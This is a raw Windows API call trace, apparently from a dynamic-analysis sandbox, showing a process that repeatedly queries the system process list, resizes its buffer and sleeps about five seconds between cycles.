[0154.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.084] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.101] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.129] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.145] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.145] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.148] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.168] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.179] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.196] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.213] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.226] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.241] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.257] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.274] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.288] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.306] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.319] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.335] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.352] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.379] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.397] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.413] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.429] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.441] 